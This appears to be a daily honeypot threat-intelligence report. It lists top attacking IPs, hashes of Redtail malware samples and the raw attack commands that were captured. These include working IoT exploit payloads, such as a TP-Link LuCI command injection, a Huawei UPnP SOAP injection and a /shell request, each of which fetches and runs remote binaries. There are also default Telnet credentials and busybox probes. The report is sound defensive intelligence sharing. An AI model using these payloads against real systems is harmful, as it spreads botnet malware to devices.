Top 5 IPs for 2024-06-09 :

13.87.204.143
91.151.83.183
129.226.156.194
43.163.214.38
82.223.128.188


Malware Observed:

File name : redtail.arm7
a843ac9c087f399fbf8ef10fec872a732c9cf97c2cd249566a6133a2cebdc0c1
https://www.virustotal.com/gui/file/a843ac9c087f399fbf8ef10fec872a732c9cf97c2cd249566a6133a2cebdc0c1

File name : redtail.arm8
88dc89bf303026c3ea273d879148e308a503cb211538f4cc47b667cf9f43bebb
https://www.virustotal.com/gui/file/88dc89bf303026c3ea273d879148e308a503cb211538f4cc47b667cf9f43bebb

File name : redtail.i686
8fc5d13238daba3a4986d674ad885f81850c67000c7f4f57df707f5d810ad241
https://www.virustotal.com/gui/file/8fc5d13238daba3a4986d674ad885f81850c67000c7f4f57df707f5d810ad241

File name : redtail.x86_64
19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d
https://www.virustotal.com/gui/file/19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d


File name : setup.sh
3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae
https://www.virustotal.com/gui/file/3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae

Commands/exploits observed:

/shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/server.cnc-kovey.ru/nznsnSCwZ356pP/Aqua.arm7;chmod+777+Aqua.arm7;./Aqua.arm7+“cams;wget+http:/\\/server.cnc-kovey.ru/nznsnSCwZ356pP/Aqua.arm4;chmod+777+Aqua.arm4;./Aqua.arm4+“cams;wget+http:/\\/server.cnc-kovey.ru/nznsnSCwZ356pP/Aqua.arm5;chmod+777+Aqua.arm5;./Aqua.arm5+“cams;wget+http:/\\/server.cnc-kovey.ru/nznsnSCwZ356pP/Aqua.arm6;chmod+777+Aqua.arm6;./Aqua.arm6+“cams

http://<host-“>/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.71.81%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)

root
...juantech
root
...54321
888888
...888888
enable
system
shell
sh
cat /proc/mounts; /bin/busybox FFAVD
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox FFAVD
tftp; wget; /bin/busybox FFAVD
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s


<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.200 -l /tmp/xxtea -r /hm“s; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
